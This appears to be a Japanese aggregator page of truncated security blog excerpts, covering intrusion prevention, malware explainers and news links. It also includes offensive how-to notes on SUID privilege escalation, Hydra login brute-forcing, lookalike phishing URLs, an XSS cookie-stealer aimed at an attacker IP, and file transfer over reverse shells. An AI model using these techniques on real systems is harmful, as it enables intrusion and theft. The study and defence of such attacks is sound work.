- 1. UbuntuにIPS(Suricata)を導入する
- 2. exploit kit とは
- 3. 2022/5/14主にITとかセキュリティの記事
- 4. 暗号化とハッシュ化の違いとは
- 5. AWS Security Hubの結果をさらしてみる
- 6. SUIDと相対パスによる権限昇格
- 7. rootkit ってなに?
- 8. 2022/5/13主にITとかセキュリティの記事
- 9. 2022/5/12主にITとかセキュリティの記事
- 10. HydraでHTTPのログインをブルートフォース
- 11. 知っておきたい Kubernetes Security Context 設定 10 選
- 12. 2022/5/11主にITとかセキュリティの記事
- 13. リファラースパム とは
- 14. 不正なURLの作成
- 15. 様々なセキュリティ上の攻撃方法とその対策
- 16. 2022/5/10主にITとかセキュリティの記事
- 17. Shodanの使い方(検索クエリとか)
- 18. XSSでcookieを取得
- 19. pythonで簡易サーバを立てて簡単にファイル転送
- 20. プロキシチェーン+Torで匿名化する
UbuntuにIPS(Suricata)を導入する
## 前書き
Suricata公式ドキュメントをみて試行錯誤してましたが、
最終的にはDigital Ocean社の記事を参考にさせていただきました。## 環境
OS: Ubuntu 20.04
ファイアウォール: nftables## リポジトリ追加
– Suricataのパッケージがあるリポジトリを追加する。“`
sudo add-apt-repository ppa:oisf/suricata-stable
“`## Suricataインストール
“`
sudo apt install suricata
sudo systemctl enable suricata.service
“`## Suricata初期設定
– 監視対象のインターフェース名を確認する。
“`
ip -p -j route show default
“`– 「interface」を環境に合わせて修正する。
“`
sudo nano /etc/suricata/suricata.yaml# Linux high speed cap
exploit kit とは
## 勉強前イメージ
rootkit調べてたときに出てたから似たような感じ?
## 調査
### exploit kit とは
エクスプロイトキット と読み、システムの脆弱性を攻撃するプログラムをパッケージ化したハッキングツールになります。
元々エクスプロイトとは、システムの脆弱性を攻撃するプログラムのことを指し
webブラウザの脆弱性を狙ったり、ブラウザからアクセスできるプログラムのセキュリティホールを悪用したりします。
そのプログラムをパッケージ化したものがエクスプロイトキットと言われています。最近ではSaaSをもじったEaaS(Exploit Pack as a Service)と言われるプラットフォームを通じて
エクスプロイトキットのホスティングサービスも存在すると言われています。### exploit kitの感染経路
– リンクをクリックさせる
ユーザにリンクをクリックさせてwebページを開く。
スパムメールなどが感染経路になる。– 接続させる
攻撃元のサイトに接続される。
主にクロスサイトスクリプティングなどが利用される– セキュリティホー
2022/5/14主にITとかセキュリティの記事
Zyxel製品の深刻な脆弱性、4月に修正済み – 報告者がサイレントパッチの危険性を指摘
https://www.security-next.com/136454「Apache Tomcat」のクラスタリング運用に注意 – 必要に応じて対策を
https://www.security-next.com/136478説明会申込フォーム、他者情報が閲覧できる状態に – 大阪産業局
https://www.security-next.com/136458かんぽ生命を装う偽メールやSMSに注意
https://www.security-next.com/136464「EC-CUBE」向けプラグイン「簡単ブログ for EC-CUBE4」に脆弱性
https://www.security-next.com/136482トレンド製「スマートホームスキャナー」のインストーラに脆弱性 – 最新版の利用を
https://www.security-next.com/136468サイバー保安企業への投資、韓国企業の9割が5億円未満(5/12)
https://www.kedglob
暗号化とハッシュ化の違いとは
演習でlocalStrageを使ってログイン機能を実装した時に[crypto.js](https://cryptojs.gitbook.io/docs/)を使用し、入力されたパスワードのハッシュ化を行ったので、暗号化とハッシュ化について調べてみた。
# ハッシュ化
ハッシュ化とは特定の計算手法に基づいて、元のデータを不規則な文字列に置換する処理。
ハッシュ化を施すアルゴリズムはハッシュ関数と呼ばれ、ハッシュ関数によって生成されるランダムな文字列はハッシュ値と呼ばれる。
**暗号化は可逆的な変換**であり、**ハッシュ化は不可逆**。## 使用例
– パスワード保存・管理
– ビットコイン、ブロックチェーン
– 電子メール## **ハッシュ化の規格**
– **MD5**
現在は非推奨
– **SHA-1**
グーグルも既にSHA-1の証明書受け入れを停止
– **SHA-2**
SHA-256、SHA-384、SHA-512、SHA-512/224、SHA-512/256
– **SHA-3**
2015年に公表された新たなハッシュ関数# 暗号化
**暗号化**と
AWS Security Hubの結果をさらしてみる
[AWS Security Hub](https://aws.amazon.com/jp/security-hub/)とは
> **セキュリティ体制の管理と改善**
> AWS Security Hub では、AWS のセキュリティステータスを一括表示できます。セキュリティチェックを自動化し、セキュリティ検出結果を管理し、AWS 環境全体にわたってセキュリティで最優先すべき問題を洗い出します。2022/5/13現在、以下のセキュリティ基準が用意されています。
* CIS AWS Foundations Benchmark
* AWS 基礎セキュリティのベストプラクティス
* PCI DSS個人で利用しているAWSアカウントにSecurity Hubを有効にしましたので、「AWS 基礎セキュリティのベストプラクティス」のスコアをさらしてみます。
どーん
![ap-northeast-1.console.aws.amazon.com_securityhub_home_region=ap-northeast-1(1280×720).png](https://qiita-imag
SUIDと相対パスによる権限昇格
root権限で実行されるコマンド内に、相対パスで参照されるコマンドがある状況での権限昇格について。
(root権限で実行される理由は、sudoでもSUIDでもなんでもいいが、今回の例ではSUID。)
# 怪しいSUIDビット付きのELFファイル
“`
theseus@ubuntu:~$ ls -l /bin/sysinfo
-rwsr-x— 1 root users 22040 Oct 21 2019 /bin/sysinfotheseus@ubuntu:/$ file /bin/sysinfo
/bin/sysinfo: setuid ELF 64-bit LSB shared object, x86-64 …
“``strings`コマンドで見てみると、中で`lshw`、`fdisk`、`cat`コマンドを実行していることが分かる:
“`
theseus@ubuntu:~$ strings /bin/sysinfo
…8<... ====================Hardware Info==================== lshw
rootkit ってなに?
## 勉強前イメージ
アンドロイドのなんかやったようなきがする
気のせい?## 調査
### rootkit とは
不正アクセスに成功した攻撃者が侵入した後
管理者に気づかれずに遠隔操作するためのツールを指します。
例えば、遠隔操作の際にログを残さないようにするものだったり
他のマルウェアが刺入して攻撃するのを補助するようなツールも含まれています。これらは一般的なセキュリティソフトでも検知が難しい。
理由としてはrootkit自体が自身の存在を隠蔽する機能を持っているので検出が困難といわてています。rootkitは [ダークウェブ](https://qiita.com/miyuki_samitani/items/3518a865324e294643e8) で取引されて
悪意のある攻撃者にわかっていると言われています。### rootkitのツール
rootkitには以下のようなツールが含まれています。
– ログ改ざんツール
侵入を隠蔽、rootkit自体の存在を隠して検知をさせなくする
– バックドア生成ツール
rootkitの侵入経路を塞がれたとしても
2022/5/13主にITとかセキュリティの記事
ブラザー会員サイトで不正ログイン、P交換被害も – 3月末からアクセス急増
https://www.security-next.com/136422一部Facebook連携で別人より個人情報が閲覧可能に – アート販売サイト
https://www.security-next.com/136426宇都宮CATV運営の通販サイトがサイバー被害、カード情報流出か(5/11)
https://cybersecurity-jp.com/news/66493F5 BIG-IPの脆弱性を利用するサイバー攻撃を確認 直ちにアップデートを(5/11)
https://www.itmedia.co.jp/enterprise/spv/2205/11/news038.htmlしまむら、システム障害 大型連休中にサイバー攻撃(5/11)
https://www.nikkei.com/article/DGXZQOUC10CD00Q2A510C2000000/海外グループ会社サーバーへの不正アクセスに関するお知らせ(5/11)
https://www.ryobi-group.co.jp/ne
2022/5/12主にITとかセキュリティの記事
「BIG-IP」脆弱性に注意 – 実証コード公開済み、探索や悪用も
https://www.security-next.com/1363922021年に悪用多かった脆弱性トップ15 – 首位は「Log4Shell」、VPNも引き続き標的に
https://www.security-next.com/136375しまむら、サイバー攻撃でシステム障害 – 全店舗の一部サービスに影響
https://www.security-next.com/136406脆弱性管理避けられぬOSS、経産省が事例集を拡充
https://www.security-next.com/136391企業がサプライチェーンのセキュリティに取り組む際に必要な6つのポイント(5/10)
https://news.mynavi.jp/techplus/article/20220510-2342223/日本企業が標的型攻撃に取るべき対策は「侵入されても持ち出させない」(5/10)
https://news.mynavi.jp/techplus/article/20220510-2342459/DNP
HydraでHTTPのログインをブルートフォース
HydraでHTTP(POSTフォーム)のログインページをブルートフォースアタックする方法についてメモ。
(Hydraの読み方は**ハイドラ**です。)
# Hydraに必要な情報をBurp Suiteで取得する
Burp Suite上のブラウザを使ってターゲットのログインページにいく。
(Burp Suiteを開いて、Proxy > Intercept > Open Browser)
![loginpage.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/2659122/dd55693c-1b70-5712-b457-47af0699f970.png)まず試しに適当なユーザネームとパスワードの組み合わせでログインを試みる。
Username: admin, Password: adminの組み合わせで試したところ次のように表示された:
![invalidcreds.png](https://qiita-image-store.s3.ap-northeast-1.amaz
知っておきたい Kubernetes Security Context 設定 10 選
本記事は 2021 年 3 月 9 日に公開した英語ブログ [10 Kubernetes Security Context settings you should understand](https://snyk.io/blog/10-kubernetes-security-context-settings-you-should-understand/?utm_source=Qiita&utm_medium=Referral&utm_campaign=QiitaBlog) を日本語化した内容です。
[![logo-vertical-solid-background.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/2216557/538611f7-03c6-0644-1508-c56a13c5bcf0.png)](https://snyk.io/jp?utm_source=Qiita&utm_medium=Referral&utm_campaign=QiitaBlog)
## はじめに
Kuberne
2022/5/11主にITとかセキュリティの記事
フィッシングサイト、4月だけで1万件超 – 「au」の悪用報告が4.5倍に
https://www.security-next.com/136339「Magnitude Simba」のODBCドライバなどに脆弱性
https://www.security-next.com/136336若者向け就労支援事業の委託先で「Emotet」感染 – 東京労働局
https://www.security-next.com/136349LINEギフトの誕生日公開、ヘルプ記載と異なる仕様
https://www.security-next.com/136342観光支援のクーポン発行システムで個人情報が閲覧可能に – 栃木県
https://www.security-next.com/136345経産省 産業界へのメッセージ発出 サイバー攻撃に対応 セキュリティ強化を(5/9)
https://ab.jcci.or.jp/article/63803/ソフォス、「アジア太平洋地域と日本のサイバーセキュリティの展望」の第3版を発表(5/9)
https://securityinsig
リファラースパム とは
## 勉強前イメージ
リファラのスパム・・・・
## 調査
### そもそもリファラとは?
リファラは参照元のページを指し、あるページにアクセス際に経由したページの事になります。
### リファラースパム とは
サイトの管理者がweb解析ツールを使ってユーザの集客経路(リファラ)を調べていると予想して
架空のwebサイトから訪問したと見せかけて関係のないページに誘導することを指します。
また、その関係のないページにウイルス等を仕込むこともある。
悪意を持って参照元の情報を残すことを `リファラースパム` と言います。リファラースパムは他のサイトに誘導されるだけでなく、
アクセス解析がリファラースパムによって正しい状態ではないので精度が落ちてしまいます。
また上記にも記載しましたが別のサイトを開いたサイトの管理者がウイルスに感染するおそれもあります。
そのウイルスによって個人情報などが流出してしまうことも可能性としてあります。
一番大きいのがリファラースパムを放置しているとSEOの評価が下がる可能性もあります。リファラースパムはweb解析ツールからフィルタ機能
web
不正なURLの作成
EvilURL:
https://github.com/UndeadSec/EvilURL
なんだかそのままだとpythonに関するエラーが出てしまう(少なくとも自分の環境では)。
なのでシェバンをpython3のそれに書き換える
“`
#!/usr/bin/env python3
“`パッケージのインストールにもpipではなくpip3を使う
“`
pip3 install python-nmap python-whois
“`今回は**instagram.com**を不正なurlに変換してみる。
まず`-g`で生成。`-c`を指定することにより、作成した不正なドメインが現時点でconnection downであることを確かめる。
![scsh1.jpg](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/2659122/7bd8eb72-8afa-fe79-fb88-3dc342005bb6.jpeg)さらに-`a`を指定して、作成された不正なドメインが利用可能か?をチェック
![s
様々なセキュリティ上の攻撃方法とその対策
# 1. 秘匿情報の漏洩 – 物理的な漏洩
### 起きうる物理的漏洩
* カフェで仕事をしていて画面に表示されている個人情報や会社の機密情報を第三者が盗撮する。
* 自宅や会社のゴミ捨て場に捨てた会社の書類を第三者が持ち出す。
* 部屋の画像を友人に送り、その画像に会社の機密情報が含まれていた。
* 机の上に無造作に放置していた書類やPCを誰かが持ち出す。### 対策
* 公共の場で個人情報や機密情報が書かれた画面を出さないというのもあるが、気をつけていてもうっかりそのような画面を出してしまうことが考えられるので、そもそも情報漏洩のリスクがある公共の場で仕事をしない。
* 機密書類などは必ずシュレッダーにかけて捨てる。自宅にそのような設備がなければ、会社などに持っていきシュレッダーにかける。またカードやディスクなどは確実に裁断し、PCなどは完全にデータを消去してから廃棄する。
* 部屋の様子など個人情報が写ってしまうリスクのある場所を友人などに送らない。SNSにのっけるなどはもってのほか。
* 機密情報が載っている書類やPCなどは肌身離さず持ち歩く。# 2. 秘匿情報の漏洩
2022/5/10主にITとかセキュリティの記事
富士通製のセキュリティ帯域制御製品に深刻な脆弱性
https://www.security-next.com/136318「OpenSSL」に4件の脆弱性 – アップデートが公開
https://www.security-next.com/136315メールアカウントに不正アクセス、スパムの踏み台に – サエラ薬局
https://www.security-next.com/136309シスコの複数製品に緊急の脆弱性、ただちにアップデートを(5/6)
https://news.mynavi.jp/techplus/article/20220506-2338810/ロシアのウクライナ侵攻に関連したサイバー攻撃でアルコール流通一時停止(5/8)
https://news.mynavi.jp/techplus/article/20220508-2340744/健康アプリ続々、期待と不安 効果の適正表示へ国が指針(5/7)
https://www.nikkei.com/article/DGXZQOUA31CV80R30C22A3000000/議員投稿を転載 告訴検討…箕
Shodanの使い方(検索クエリとか)
Shodanの使い方、特に検索クリエについてまとめます。
https://www.shodan.io/
# Shodanの検索クエリ
## 都市(city)
“`
city:Tokyocity:”San Diego”
“`## 国(country)
“`
country: jp
“`
※「ja」じゃなくて「jp」国コード一覧はこちら:
https://iss.ndl.go.jp/help/help_ja/help_country_codes.html
# かつ(AND)、または(OR)否定(NOT)
AND検索は単純にクエリを半角スペースで並べればよい。
![tokyoandjp.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/2659122/13475298-3f56-081a-f4c0-7c706e6e3e01.png)ORは、カンマで区切る。
例えば「sshでポート番号が22または3333」を検索するには
“`
ssh port:22,3333
“`
XSSでcookieを取得
# xssでcookieをとるのに便利なツール
https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py
# 使い方
まずはXSS-cookie-stealer.pyを実行する。これでポート8888でサーバがたつ。
“`
python XSS-cookie-stealer.py
“`そしたら、xssの攻撃をする。
具体的に以下のようなペイロードを注入してやる(このペイロードは、XSS-cookie-stealer.py中のコメントでお勧めされてるもの):
“`
“``X.X.X.X`はアタッカー側のIPアドレス。
ちなみに以下のペイロードでも可能:
“`
“
pythonで簡易サーバを立てて簡単にファイル転送
FTP、HTTP、SMBサーバを簡単に立ち上げる。さらにそれを使って簡単にファイル転送する。
リバースシェル間でのファイル転送にすごく便利。
特に良い点が、`-d`オプションを使ってどこからでも任意のディレクトリをシェアフォルダにできるということ。
# FTPサーバー
`pip install pyftpdlib`でインストール。
https://github.com/giampaolo/pyftpdlib
カレントディレクトリをシェアフォルダとして、21番ポートで、anonymousアクセスに書き込み権限を与えるならば
“`
python3 -m pyftpdlib -w -p 21
“`(ポートを指定しない場合のデフォルトポートは2121)
/opt/PEASS-ngをシェアフォルダにしたい場合、わざわざそこに移動しなくてもカレントディレクトリ上で次のように`-d`オプションを使えばよい
“`
python3 -m pyftpdlib -w -p 21 -d /opt/PEASS-ng
“`## FTPとファイル転送
まずftpサーバに接続:
プロキシチェーン+Torで匿名化する
プロキシチェーンとTorを使ってIPアドレスを隠し匿名化する。
Torがインストールされてる前提でいきます。
# プロキシチェーンと匿名化
簡単なイメージ:
![proxych_image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/2659122/3e18c2bc-e694-5d0c-8780-0944e46645ec.png)
画像:[Umbrella: Proxy Chaining を用いた SWG の導入について](https://community.cisco.com/t5/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3-%E3%83%89%E3%82%AD%E3%83%A5%E3%83%A1%E3%83%B3%E3%83%88/umbrella-proxy-chaining-%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F-swg-%E3%81%AE%E5%B0%8E%E5%85%A5%E3%8